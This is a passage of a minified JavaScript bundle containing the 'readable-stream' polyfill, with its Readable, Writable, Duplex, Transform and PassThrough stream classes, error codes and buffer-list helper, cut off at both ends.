y)},TypeError),E("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),E("ERR_METHOD_NOT_IMPLEMENTED",function(b){return"The "+b+" method is not implemented"}),E("ERR_STREAM_PREMATURE_CLOSE","Premature close"),E("ERR_STREAM_DESTROYED",function(b){return"Cannot call "+b+" after a stream was destroyed"}),E("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),E("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),E("ERR_STREAM_WRITE_AFTER_END","write after end"),E("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),E("ERR_UNKNOWN_ENCODING",function(b){return"Unknown encoding: "+b},TypeError),E("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),Q.exports.q=F},8656:(Q,F,E)=>{"use strict";var g=E(4155),b=Object.keys||function(O){var U=[];for(var K in O)U.push(K);return U};Q.exports=w;var _=E(6577),y=E(323);E(5717)(w,_);for(var M=b(y.prototype),p=0;p<M.length;p++){var D=M[p];w.prototype[D]||(w.prototype[D]=y.prototype[D])}function w(O){if(!(this instanceof w))return new w(O);_.call(this,O),y.call(this,O),this.allowHalfOpen=!0,O&&(!1===O.readable&&(this.readable=!1),!1===O.writable&&(this.writable=!1),!1===O.allowHalfOpen&&(this.allowHalfOpen=!1,this.once("end",x)))}function x(){this._writableState.ended||g.nextTick(S,this)}function S(O){O.end()}Object.defineProperty(w.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),Object.defineProperty(w.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(w.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(w.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&void 0!==this._writableState&&this._readableState.destroyed&&this._writableState.destroyed},set:function(O){void 0!==this._readableState&&void 0!==this._writableState&&(this._readableState.destroyed=O,this._writableState.destroyed=O)}})},2366:(Q,F,E)=>{"use strict";Q.exports=b;var g=E(4473);function b(_){if(!(this instanceof b))return new b(_);g.call(this,_)}E(5717)(b,g),b.prototype._transform=function(_,y,M){M(null,_)}},6577:(Q,F,E)=>{"use strict";var g,b=E(4155);Q.exports=v,v.ReadableState=A,E(7187);var _,y=function(De,Ve){return De.listeners(Ve).length},M=E(3194),p=E(8764).Buffer,D=E.g.Uint8Array||function(){},w=E(5575);_=w&&w.debuglog?w.debuglog("stream"):function(){};var x,S,O,U=E(9686),K=E(1029),ee=E(94).getHighWaterMark,se=E(8106).q,ve=se.ERR_INVALID_ARG_TYPE,le=se.ERR_STREAM_PUSH_AFTER_EOF,ye=se.ERR_METHOD_NOT_IMPLEMENTED,z=se.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;E(5717)(v,M);var l=K.errorOrDestroy,f=["error","close","destroy","pause","resume"];function A(De,Ve,ze){g=g||E(8656),"boolean"!=typeof ze&&(ze=Ve instanceof g),this.objectMode=!!(De=De||{}).objectMode,ze&&(this.objectMode=this.objectMode||!!De.readableObjectMode),this.highWaterMark=ee(this,De,"readableHighWaterMark",ze),this.buffer=new U,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==De.emitClose,this.autoDestroy=!!De.autoDestroy,this.destroyed=!1,this.defaultEncoding=De.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,De.encoding&&(x||(x=E(2553).s),this.decoder=new x(De.encoding),this.encoding=De.encoding)}function v(De){if(g=g||E(8656),!(this instanceof v))return new v(De);this._readableState=new A(De,this,this instanceof g),this.readable=!0,De&&("function"==typeof De.read&&(this._read=De.read),"function"==typeof De.destroy&&(this._destroy=De.destroy)),M.call(this)}function P(De,Ve,ze,me,Ke){_("readableAddChunk",Ve);var rt,Qe,ht,mt,lt,Ge=De._readableState;if(null===Ve)Ge.reading=!1,function(Qe,ht){if(_("onEofChunk"),!ht.ended){if(ht.decoder){var mt=ht.decoder.end();mt&&mt.length&&(ht.buffer.push(mt),ht.length+=ht.objectMode?1:mt.length)}ht.ended=!0,ht.sync?h(Qe):(ht.needReadable=!1,ht.emittedReadable||(ht.emittedReadable=!0,R(Qe)))}}(De,Ge);else if(Ke||(Qe=Ge,p.isBuffer(lt=ht=Ve)||lt instanceof D||"string"==typeof ht||void 0===ht||Qe.objectMode||(mt=new ve("chunk",["string","Buffer","Uint8Array"],ht)),rt=mt),rt)l(De,rt);else if(Ge.objectMode||Ve&&Ve.length>0)if("string"==typeof Ve||Ge.objectMode||Object.getPrototypeOf(Ve)===p.prototype||(Ve=function(Qe){return p.from(Qe)}(Ve)),me)Ge.endEmitted?l(De,new z):G(De,Ge,Ve,!0);else if(Ge.ended)l(De,new le);else{if(Ge.destroyed)return!1;Ge.reading=!1,Ge.decoder&&!ze?(Ve=Ge.decoder.write(Ve),Ge.objectMode||0!==Ve.length?G(De,Ge,Ve,!1):J(De,Ge)):G(De,Ge,Ve,!1)}else me||(Ge.reading=!1,J(De,Ge));return!Ge.ended&&(Ge.length<Ge.highWaterMark||0===Ge.length)}function G(De,Ve,ze,me){Ve.flowing&&0===Ve.length&&!Ve.sync?(Ve.awaitDrain=0,De.emit("data",ze)):(Ve.length+=Ve.objectMode?1:ze.length,me?Ve.buffer.unshift(ze):Ve.buffer.push(ze),Ve.needReadable&&h(De)),J(De,Ve)}Object.defineProperty(v.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&this._readableState.destroyed},set:function(De){this._readableState&&(this._readableState.destroyed=De)}}),v.prototype.destroy=K.destroy,v.prototype._undestroy=K.undestroy,v.prototype._destroy=function(De,Ve){Ve(De)},v.prototype.push=function(De,Ve){var ze,me=this._readableState;return me.objectMode?ze=!0:"string"==typeof De&&((Ve=Ve||me.defaultEncoding)!==me.encoding&&(De=p.from(De,Ve),Ve=""),ze=!0),P(this,De,Ve,!1,ze)},v.prototype.unshift=function(De){return P(this,De,null,!0,!1)},v.prototype.isPaused=function(){return!1===this._readableState.flowing},v.prototype.setEncoding=function(De){x||(x=E(2553).s);var Ve=new x(De);this._readableState.decoder=Ve,this._readableState.encoding=this._readableState.decoder.encoding;for(var ze=this._readableState.buffer.head,me="";null!==ze;)me+=Ve.write(ze.data),ze=ze.next;return this._readableState.buffer.clear(),""!==me&&this._readableState.buffer.push(me),this._readableState.length=me.length,this};var X=1073741824;function L(De,Ve){return De<=0||0===Ve.length&&Ve.ended?0:Ve.objectMode?1:De!=De?Ve.flowing&&Ve.length?Ve.buffer.head.data.length:Ve.length:(De>Ve.highWaterMark&&(Ve.highWaterMark=((ze=De)>=X?ze=X:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze)),De<=Ve.length?De:Ve.ended?Ve.length:(Ve.needReadable=!0,0));var ze}function h(De){var Ve=De._readableState;_("emitReadable",Ve.needReadable,Ve.emittedReadable),Ve.needReadable=!1,Ve.emittedReadable||(_("emitReadable",Ve.flowing),Ve.emittedReadable=!0,b.nextTick(R,De))}function R(De){var Ve=De._readableState;_("emitReadable_",Ve.destroyed,Ve.length,Ve.ended),Ve.destroyed||!Ve.length&&!Ve.ended||(De.emit("readable"),Ve.emittedReadable=!1),Ve.needReadable=!Ve.flowing&&!Ve.ended&&Ve.length<=Ve.highWaterMark,Ue(De)}function J(De,Ve){Ve.readingMore||(Ve.readingMore=!0,b.nextTick(Z,De,Ve))}function Z(De,Ve){for(;!Ve.reading&&!Ve.ended&&(Ve.length<Ve.highWaterMark||Ve.flowing&&0===Ve.length);){var ze=Ve.length;if(_("maybeReadMore read 0"),De.read(0),ze===Ve.length)break}Ve.readingMore=!1}function ue(De){var Ve=De._readableState;Ve.readableListening=De.listenerCount("readable")>0,Ve.resumeScheduled&&!Ve.paused?Ve.flowing=!0:De.listenerCount("data")>0&&De.resume()}function Ie(De){_("readable nexttick read 0"),De.read(0)}function Ae(De,Ve){_("resume",Ve.reading),Ve.reading||De.read(0),Ve.resumeScheduled=!1,De.emit("resume"),Ue(De),Ve.flowing&&!Ve.reading&&De.read(0)}function Ue(De){var Ve=De._readableState;for(_("flow",Ve.flowing);Ve.flowing&&null!==De.read(););}function Xe(De,Ve){return 0===Ve.length?null:(Ve.objectMode?ze=Ve.buffer.shift():!De||De>=Ve.length?(ze=Ve.decoder?Ve.buffer.join(""):1===Ve.buffer.length?Ve.buffer.first():Ve.buffer.concat(Ve.length),Ve.buffer.clear()):ze=Ve.buffer.consume(De,Ve.decoder),ze);var ze}function He(De){var Ve=De._readableState;_("endReadable",Ve.endEmitted),Ve.endEmitted||(Ve.ended=!0,b.nextTick(Be,Ve,De))}function Be(De,Ve){if(_("endReadableNT",De.endEmitted,De.length),!De.endEmitted&&0===De.length&&(De.endEmitted=!0,Ve.readable=!1,Ve.emit("end"),De.autoDestroy)){var ze=Ve._writableState;(!ze||ze.autoDestroy&&ze.finished)&&Ve.destroy()}}function qe(De,Ve){for(var ze=0,me=De.length;ze<me;ze++)if(De[ze]===Ve)return ze;return-1}v.prototype.read=function(De){_("read",De),De=parseInt(De,10);var Ve=this._readableState,ze=De;if(0!==De&&(Ve.emittedReadable=!1),0===De&&Ve.needReadable&&((0!==Ve.highWaterMark?Ve.length>=Ve.highWaterMark:Ve.length>0)||Ve.ended))return _("read: emitReadable",Ve.length,Ve.ended),0===Ve.length&&Ve.ended?He(this):h(this),null;if(0===(De=L(De,Ve))&&Ve.ended)return 0===Ve.length&&He(this),null;var me,Ke=Ve.needReadable;return _("need readable",Ke),(0===Ve.length||Ve.length-De<Ve.highWaterMark)&&_("length less than watermark",Ke=!0),Ve.ended||Ve.reading?_("reading or ended",Ke=!1):Ke&&(_("do read"),Ve.reading=!0,Ve.sync=!0,0===Ve.length&&(Ve.needReadable=!0),this._read(Ve.highWaterMark),Ve.sync=!1,Ve.reading||(De=L(ze,Ve))),null===(me=De>0?Xe(De,Ve):null)?(Ve.needReadable=Ve.length<=Ve.highWaterMark,De=0):(Ve.length-=De,Ve.awaitDrain=0),0===Ve.length&&(Ve.ended||(Ve.needReadable=!0),ze!==De&&Ve.ended&&He(this)),null!==me&&this.emit("data",me),me},v.prototype._read=function(De){l(this,new ye("_read()"))},v.prototype.pipe=function(De,Ve){var ze=this,me=this._readableState;switch(me.pipesCount){case 0:me.pipes=De;break;case 1:me.pipes=[me.pipes,De];break;default:me.pipes.push(De)}me.pipesCount+=1,_("pipe count=%d opts=%j",me.pipesCount,Ve);var Ke=Ve&&!1===Ve.end||De===b.stdout||De===b.stderr?xe:rt;function rt(){_("onend"),De.end()}me.endEmitted?b.nextTick(Ke):ze.once("end",Ke),De.on("unpipe",function We(Je,Oe){_("onunpipe"),Je===ze&&Oe&&!1===Oe.hasUnpiped&&(Oe.hasUnpiped=!0,_("cleanup"),De.removeListener("close",lt),De.removeListener("finish",ft),De.removeListener("drain",Ge),De.removeListener("error",mt),De.removeListener("unpipe",We),ze.removeListener("end",rt),ze.removeListener("end",xe),ze.removeListener("data",ht),Qe=!0,!me.awaitDrain||De._writableState&&!De._writableState.needDrain||Ge())});var We,Ge=(We=ze,function(){var Je=We._readableState;_("pipeOnDrain",Je.awaitDrain),Je.awaitDrain&&Je.awaitDrain--,0===Je.awaitDrain&&y(We,"data")&&(Je.flowing=!0,Ue(We))});De.on("drain",Ge);var Qe=!1;function ht(We){_("ondata");var Je=De.write(We);_("dest.write",Je),!1===Je&&((1===me.pipesCount&&me.pipes===De||me.pipesCount>1&&-1!==qe(me.pipes,De))&&!Qe&&(_("false write response, pause",me.awaitDrain),me.awaitDrain++),ze.pause())}function mt(We){_("onerror",We),xe(),De.removeListener("error",mt),0===y(De,"error")&&l(De,We)}function lt(){De.removeListener("finish",ft),xe()}function ft(){_("onfinish"),De.removeListener("close",lt),xe()}function xe(){_("unpipe"),ze.unpipe(De)}return ze.on("data",ht),function(We,Je,Oe){if("function"==typeof We.prependListener)return We.prependListener("error",Oe);We._events&&We._events.error?Array.isArray(We._events.error)?We._events.error.unshift(Oe):We._events.error=[Oe,We._events.error]:We.on("error",Oe)}(De,0,mt),De.once("close",lt),De.once("finish",ft),De.emit("pipe",ze),me.flowing||(_("pipe resume"),ze.resume()),De},v.prototype.unpipe=function(De){var Ve=this._readableState,ze={hasUnpiped:!1};if(0===Ve.pipesCount)return this;if(1===Ve.pipesCount)return De&&De!==Ve.pipes||(De||(De=Ve.pipes),Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1,De&&De.emit("unpipe",this,ze)),this;if(!De){var me=Ve.pipes,Ke=Ve.pipesCount;Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1;for(var rt=0;rt<Ke;rt++)me[rt].emit("unpipe",this,{hasUnpiped:!1});return this}var Ge=qe(Ve.pipes,De);return-1===Ge||(Ve.pipes.splice(Ge,1),Ve.pipesCount-=1,1===Ve.pipesCount&&(Ve.pipes=Ve.pipes[0]),De.emit("unpipe",this,ze)),this},v.prototype.addListener=v.prototype.on=function(De,Ve){var ze=M.prototype.on.call(this,De,Ve),me=this._readableState;return"data"===De?(me.readableListening=this.listenerCount("readable")>0,!1!==me.flowing&&this.resume()):"readable"===De&&(me.endEmitted||me.readableListening||(me.readableListening=me.needReadable=!0,me.flowing=!1,me.emittedReadable=!1,_("on readable",me.length,me.reading),me.length?h(this):me.reading||b.nextTick(Ie,this))),ze},v.prototype.removeListener=function(De,Ve){var ze=M.prototype.removeListener.call(this,De,Ve);return"readable"===De&&b.nextTick(ue,this),ze},v.prototype.removeAllListeners=function(De){var Ve=M.prototype.removeAllListeners.apply(this,arguments);return"readable"!==De&&void 0!==De||b.nextTick(ue,this),Ve},v.prototype.resume=function(){var ze,De=this._readableState;return De.flowing||(_("resume"),De.flowing=!De.readableListening,this,(ze=De).resumeScheduled||(ze.resumeScheduled=!0,b.nextTick(Ae,this,ze))),De.paused=!1,this},v.prototype.pause=function(){return _("call pause flowing=%j",this._readableState.flowing),!1!==this._readableState.flowing&&(_("pause"),this._readableState.flowing=!1,this.emit("pause")),this._readableState.paused=!0,this},v.prototype.wrap=function(De){var Ve=this,ze=this._readableState,me=!1;for(var Ke in De.on("end",function(){if(_("wrapped end"),ze.decoder&&!ze.ended){var Ge=ze.decoder.end();Ge&&Ge.length&&Ve.push(Ge)}Ve.push(null)}),De.on("data",function(Ge){_("wrapped data"),ze.decoder&&(Ge=ze.decoder.write(Ge)),ze.objectMode&&null==Ge||(ze.objectMode||Ge&&Ge.length)&&(Ve.push(Ge)||(me=!0,De.pause()))}),De)void 0===this[Ke]&&"function"==typeof De[Ke]&&(this[Ke]=function(Ge){return function(){return De[Ge].apply(De,arguments)}}(Ke));for(var rt=0;rt<f.length;rt++)De.on(f[rt],this.emit.bind(this,f[rt]));return this._read=function(Ge){_("wrapped _read",Ge),me&&(me=!1,De.resume())},this},"function"==typeof Symbol&&(v.prototype[Symbol.asyncIterator]=function(){return void 0===S&&(S=E(828)),S(this)}),Object.defineProperty(v.prototype,"readableHighWaterMark",{enumerable:!1,get:function(){return this._readableState.highWaterMark}}),Object.defineProperty(v.prototype,"readableBuffer",{enumerable:!1,get:function(){return this._readableState&&this._readableState.buffer}}),Object.defineProperty(v.prototype,"readableFlowing",{enumerable:!1,get:function(){return this._readableState.flowing},set:function(De){this._readableState&&(this._readableState.flowing=De)}}),v._fromList=Xe,Object.defineProperty(v.prototype,"readableLength",{enumerable:!1,get:function(){return this._readableState.length}}),"function"==typeof Symbol&&(v.from=function(De,Ve){return void 0===O&&(O=E(1265)),O(v,De,Ve)})},4473:(Q,F,E)=>{"use strict";Q.exports=w;var g=E(8106).q,b=g.ERR_METHOD_NOT_IMPLEMENTED,_=g.ERR_MULTIPLE_CALLBACK,y=g.ERR_TRANSFORM_ALREADY_TRANSFORMING,M=g.ERR_TRANSFORM_WITH_LENGTH_0,p=E(8656);function D(O,U){var K=this._transformState;K.transforming=!1;var ee=K.writecb;if(null===ee)return this.emit("error",new _);K.writechunk=null,K.writecb=null,null!=U&&this.push(U),ee(O);var se=this._readableState;se.reading=!1,(se.needReadable||se.length<se.highWaterMark)&&this._read(se.highWaterMark)}function w(O){if(!(this instanceof w))return new w(O);p.call(this,O),this._transformState={afterTransform:D.bind(this),needTransform:!1,transforming:!1,writecb:null,writechunk:null,writeencoding:null},this._readableState.needReadable=!0,this._readableState.sync=!1,O&&("function"==typeof O.transform&&(this._transform=O.transform),"function"==typeof O.flush&&(this._flush=O.flush)),this.on("prefinish",x)}function x(){var O=this;"function"!=typeof this._flush||this._readableState.destroyed?S(this,null,null):this._flush(function(U,K){S(O,U,K)})}function S(O,U,K){if(U)return O.emit("error",U);if(null!=K&&O.push(K),O._writableState.length)throw new M;if(O._transformState.transforming)throw new y;return O.push(null)}E(5717)(w,p),w.prototype.push=function(O,U){return this._transformState.needTransform=!1,p.prototype.push.call(this,O,U)},w.prototype._transform=function(O,U,K){K(new b("_transform()"))},w.prototype._write=function(O,U,K){var ee=this._transformState;if(ee.writecb=K,ee.writechunk=O,ee.writeencoding=U,!ee.transforming){var se=this._readableState;(ee.needTransform||se.needReadable||se.length<se.highWaterMark)&&this._read(se.highWaterMark)}},w.prototype._read=function(O){var U=this._transformState;null===U.writechunk||U.transforming?U.needTransform=!0:(U.transforming=!0,this._transform(U.writechunk,U.writeencoding,U.afterTransform))},w.prototype._destroy=function(O,U){p.prototype._destroy.call(this,O,function(K){U(K)})}},323:(Q,F,E)=>{"use strict";var g,b=E(4155);function _(J){var Z=this;this.next=null,this.entry=null,this.finish=function(){!function(ue,Ie,Ae){var Ue=ue.entry;for(ue.entry=null;Ue;){var Xe=Ue.callback;Ie.pendingcb--,Xe(void 0),Ue=Ue.next}Ie.corkedRequestsFree.next=ue}(Z,J)}}Q.exports=v,v.WritableState=A;var y,M={deprecate:E(4927)},p=E(3194),D=E(8764).Buffer,w=E.g.Uint8Array||function(){},x=E(1029),S=E(94).getHighWaterMark,O=E(8106).q,U=O.ERR_INVALID_ARG_TYPE,K=O.ERR_METHOD_NOT_IMPLEMENTED,ee=O.ERR_MULTIPLE_CALLBACK,se=O.ERR_STREAM_CANNOT_PIPE,ve=O.ERR_STREAM_DESTROYED,le=O.ERR_STREAM_NULL_VALUES,ye=O.ERR_STREAM_WRITE_AFTER_END,z=O.ERR_UNKNOWN_ENCODING,l=x.errorOrDestroy;function f(){}function A(J,Z,ue){g=g||E(8656),"boolean"!=typeof ue&&(ue=Z instanceof g),this.objectMode=!!(J=J||{}).objectMode,ue&&(this.objectMode=this.objectMode||!!J.writableObjectMode),this.highWaterMark=S(this,J,"writableHighWaterMark",ue),this.finalCalled=!1,this.needDrain=!1,this.ending=!1,this.ended=!1,this.finished=!1,this.destroyed=!1,this.decodeStrings=!(!1===J.decodeStrings),this.defaultEncoding=J.defaultEncoding||"utf8",this.length=0,this.writing=!1,this.corked=0,this.sync=!0,this.bufferProcessing=!1,this.onwrite=function(Ae){!function(Ue,Xe){var Ve,He=Ue._writableState,Be=He.sync,qe=He.writecb;if("function"!=typeof qe)throw new ee;if((Ve=He).writing=!1,Ve.writecb=null,Ve.length-=Ve.writelen,Ve.writelen=0,Xe)!function(Ve,ze,me,Ke,rt){--ze.pendingcb,me?(b.nextTick(rt,Ke),b.nextTick(R,Ve,ze),Ve._writableState.errorEmitted=!0,l(Ve,Ke)):(rt(Ke),Ve._writableState.errorEmitted=!0,l(Ve,Ke),R(Ve,ze))}(Ue,He,Be,Xe,qe);else{var De=L(He)||Ue.destroyed;De||He.corked||He.bufferProcessing||!He.bufferedRequest||X(Ue,He),Be?b.nextTick(G,Ue,He,De,qe):G(Ue,He,De,qe)}}(Z,Ae)},this.writecb=null,this.writelen=0,this.bufferedRequest=null,this.lastBufferedRequest=null,this.pendingcb=0,this.prefinished=!1,this.errorEmitted=!1,this.emitClose=!1!==J.emitClose,this.autoDestroy=!!J.autoDestroy,this.bufferedRequestCount=0,this.corkedRequestsFree=new _(this)}function v(J){var Z=this instanceof(g=g||E(8656));if(!Z&&!y.call(v,this))return new v(J);this._writableState=new A(J,this,Z),this.writable=!0,J&&("function"==typeof J.write&&(this._write=J.write),"function"==typeof J.writev&&(this._writev=J.writev),"function"==typeof J.destroy&&(this._destroy=J.destroy),"function"==typeof J.final&&(this._final=J.final)),p.call(this)}function P(J,Z,ue,Ie,Ae,Ue,Xe){Z.writelen=Ie,Z.writecb=Xe,Z.writing=!0,Z.sync=!0,Z.destroyed?Z.onwrite(new ve("write")):ue?J._writev(Ae,Z.onwrite):J._write(Ae,Ue,Z.onwrite),Z.sync=!1}function G(J,Z,ue,Ie){var Ae,Ue;ue||(Ae=J,0===(Ue=Z).length&&Ue.needDrain&&(Ue.needDrain=!1,Ae.emit("drain"))),Z.pendingcb--,Ie(),R(J,Z)}function X(J,Z){Z.bufferProcessing=!0;var ue=Z.bufferedRequest;if(J._writev&&ue&&ue.next){var Ae=new Array(Z.bufferedRequestCount),Ue=Z.corkedRequestsFree;Ue.entry=ue;for(var Xe=0,He=!0;ue;)Ae[Xe]=ue,ue.isBuf||(He=!1),ue=ue.next,Xe+=1;Ae.allBuffers=He,P(J,Z,!0,Z.length,Ae,"",Ue.finish),Z.pendingcb++,Z.lastBufferedRequest=null,Ue.next?(Z.corkedRequestsFree=Ue.next,Ue.next=null):Z.corkedRequestsFree=new _(Z),Z.bufferedRequestCount=0}else{for(;ue;){var Be=ue.chunk;if(P(J,Z,!1,Z.objectMode?1:Be.length,Be,ue.encoding,ue.callback),ue=ue.next,Z.bufferedRequestCount--,Z.writing)break}null===ue&&(Z.lastBufferedRequest=null)}Z.bufferedRequest=ue,Z.bufferProcessing=!1}function L(J){return J.ending&&0===J.length&&null===J.bufferedRequest&&!J.finished&&!J.writing}function h(J,Z){J._final(function(ue){Z.pendingcb--,ue&&l(J,ue),Z.prefinished=!0,J.emit("prefinish"),R(J,Z)})}function R(J,Z){var Ae,Ue,ue=L(Z);if(ue&&(Ae=J,(Ue=Z).prefinished||Ue.finalCalled||("function"!=typeof Ae._final||Ue.destroyed?(Ue.prefinished=!0,Ae.emit("prefinish")):(Ue.pendingcb++,Ue.finalCalled=!0,b.nextTick(h,Ae,Ue))),0===Z.pendingcb&&(Z.finished=!0,J.emit("finish"),Z.autoDestroy))){var Ie=J._readableState;(!Ie||Ie.autoDestroy&&Ie.endEmitted)&&J.destroy()}return ue}E(5717)(v,p),A.prototype.getBuffer=function(){for(var J=this.bufferedRequest,Z=[];J;)Z.push(J),J=J.next;return Z},function(){try{Object.defineProperty(A.prototype,"buffer",{get:M.deprecate(function(){return this.getBuffer()},"_writableState.buffer is deprecated. Use _writableState.getBuffer instead.","DEP0003")})}catch(J){}}(),"function"==typeof Symbol&&Symbol.hasInstance&&"function"==typeof Function.prototype[Symbol.hasInstance]?(y=Function.prototype[Symbol.hasInstance],Object.defineProperty(v,Symbol.hasInstance,{value:function(J){return!!y.call(this,J)||this===v&&J&&J._writableState instanceof A}})):y=function(J){return J instanceof this},v.prototype.pipe=function(){l(this,new se)},v.prototype.write=function(J,Z,ue){var Ie,He,Be,qe,Ae=this._writableState,Ue=!1,Xe=!Ae.objectMode&&(D.isBuffer(Ie=J)||Ie instanceof w);return Xe&&!D.isBuffer(J)&&(J=D.from(J)),"function"==typeof Z&&(ue=Z,Z=null),Xe?Z="buffer":Z||(Z=Ae.defaultEncoding),"function"!=typeof ue&&(ue=f),Ae.ending?(He=this,Be=ue,qe=new ye,l(He,qe),b.nextTick(Be,qe)):(Xe||function(He,Be,qe,De){var Ve;return null===qe?Ve=new le:"string"==typeof qe||Be.objectMode||(Ve=new U("chunk",["string","Buffer"],qe)),!Ve||(l(He,Ve),b.nextTick(De,Ve),!1)}(this,Ae,J,ue))&&(Ae.pendingcb++,Ue=function(He,Be,qe,De,Ve,ze){if(!qe){var me=(ht=De,(Qe=Be).objectMode||!1===Qe.decodeStrings||"string"!=typeof ht||(ht=D.from(ht,Ve)),ht);De!==me&&(qe=!0,Ve="buffer",De=me)}var Qe,ht,Ke=Be.objectMode?1:De.length;Be.length+=Ke;var rt=Be.length<Be.highWaterMark;if(rt||(Be.needDrain=!0),Be.writing||Be.corked){var Ge=Be.lastBufferedRequest;Be.lastBufferedRequest={chunk:De,encoding:Ve,isBuf:qe,callback:ze,next:null},Ge?Ge.next=Be.lastBufferedRequest:Be.bufferedRequest=Be.lastBufferedRequest,Be.bufferedRequestCount+=1}else P(He,Be,!1,Ke,De,Ve,ze);return rt}(this,Ae,Xe,J,Z,ue)),Ue},v.prototype.cork=function(){this._writableState.corked++},v.prototype.uncork=function(){var J=this._writableState;J.corked&&(J.corked--,J.writing||J.corked||J.bufferProcessing||!J.bufferedRequest||X(this,J))},v.prototype.setDefaultEncoding=function(J){if("string"==typeof J&&(J=J.toLowerCase()),!(["hex","utf8","utf-8","ascii","binary","base64","ucs2","ucs-2","utf16le","utf-16le","raw"].indexOf((J+"").toLowerCase())>-1))throw new z(J);return this._writableState.defaultEncoding=J,this},Object.defineProperty(v.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(v.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),v.prototype._write=function(J,Z,ue){ue(new K("_write()"))},v.prototype._writev=null,v.prototype.end=function(J,Z,ue){var Ue,Xe,Ie=this._writableState;return"function"==typeof J?(ue=J,J=null,Z=null):"function"==typeof Z&&(ue=Z,Z=null),null!=J&&this.write(J,Z),Ie.corked&&(Ie.corked=1,this.uncork()),Ie.ending||(this,Xe=ue,(Ue=Ie).ending=!0,R(this,Ue),Xe&&(Ue.finished?b.nextTick(Xe):this.once("finish",Xe)),Ue.ended=!0,this.writable=!1),this},Object.defineProperty(v.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(v.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._writableState&&this._writableState.destroyed},set:function(J){this._writableState&&(this._writableState.destroyed=J)}}),v.prototype.destroy=x.destroy,v.prototype._undestroy=x.undestroy,v.prototype._destroy=function(J,Z){Z(J)}},828:(Q,F,E)=>{"use strict";var g,b=E(4155);function _(le,ye,z){return ye in le?Object.defineProperty(le,ye,{value:z,enumerable:!0,configurable:!0,writable:!0}):le[ye]=z,le}var y=E(1086),M=Symbol("lastResolve"),p=Symbol("lastReject"),D=Symbol("error"),w=Symbol("ended"),x=Symbol("lastPromise"),S=Symbol("handlePromise"),O=Symbol("stream");function U(le,ye){return{value:le,done:ye}}function K(le){var ye=le[M];if(null!==ye){var z=le[O].read();null!==z&&(le[x]=null,le[M]=null,le[p]=null,ye(U(z,!1)))}}function ee(le){b.nextTick(K,le)}var se=Object.getPrototypeOf(function(){}),ve=Object.setPrototypeOf((_(g={get stream(){return this[O]},next:function(){var le=this,ye=this[D];if(null!==ye)return Promise.reject(ye);if(this[w])return Promise.resolve(U(void 0,!0));if(this[O].destroyed)return new Promise(function(A,v){b.nextTick(function(){le[D]?v(le[D]):A(U(void 0,!0))})});var z,A,v,l=this[x];if(l)z=new Promise((A=l,v=this,function(P,G){A.then(function(){v[w]?P(U(void 0,!0)):v[S](P,G)},G)}));else{var f=this[O].read();if(null!==f)return Promise.resolve(U(f,!1));z=new Promise(this[S])}return this[x]=z,z}},Symbol.asyncIterator,function(){return this}),_(g,"return",function(){var le=this;return new Promise(function(ye,z){le[O].destroy(null,function(l){l?z(l):ye(U(void 0,!0))})})}),g),se);Q.exports=function(le){var ye,z=Object.create(ve,(_(ye={},O,{value:le,writable:!0}),_(ye,M,{value:null,writable:!0}),_(ye,p,{value:null,writable:!0}),_(ye,D,{value:null,writable:!0}),_(ye,w,{value:le._readableState.endEmitted,writable:!0}),_(ye,S,{value:function(l,f){var A=z[O].read();A?(z[x]=null,z[M]=null,z[p]=null,l(U(A,!1))):(z[M]=l,z[p]=f)},writable:!0}),ye));return z[x]=null,y(le,function(l){if(l&&"ERR_STREAM_PREMATURE_CLOSE"!==l.code){var f=z[p];return null!==f&&(z[x]=null,z[M]=null,z[p]=null,f(l)),void(z[D]=l)}var A=z[M];null!==A&&(z[x]=null,z[M]=null,z[p]=null,A(U(void 0,!0))),z[w]=!0}),le.on("readable",ee.bind(null,z)),z}},9686:(Q,F,E)=>{"use strict";function g(D,w){var x=Object.keys(D);if(Object.getOwnPropertySymbols){var S=Object.getOwnPropertySymbols(D);w&&(S=S.filter(function(O){return Object.getOwnPropertyDescriptor(D,O).enumerable})),x.push.apply(x,S)}return x}function b(D,w,x){return w in D?Object.defineProperty(D,w,{value:x,enumerable:!0,configurable:!0,writable:!0}):D[w]=x,D}var y=E(8764).Buffer,M=E(5575).inspect,p=M&&M.custom||"inspect";Q.exports=function(){function D(){(function(S,O){if(!(S instanceof O))throw new TypeError("Cannot call a class as a function")})(this,D),this.head=null,this.tail=null,this.length=0}var x;return x=[{key:"push",value:function(S){var O={data:S,next:null};this.length>0?this.tail.next=O:this.head=O,this.tail=O,++this.length}},{key:"unshift",value:function(S){var O={data:S,next:this.head};0===this.length&&(this.tail=O),this.head=O,++this.length}},{key:"shift",value:function(){if(0!==this.length){var S=this.head.data;return this.head=1===this.length?this.tail=null:this.head.next,--this.length,S}}},{key:"clear",value:function(){this.head=this.tail=null,this.length=0}},{key:"join",value:function(S){if(0===this.length)return"";for(var O=this.head,U=""+O.data;O=O.next;)U+=S+O.data;return U}},{key:"concat",value:function(S){if(0===this.length)return y.alloc(0);for(var 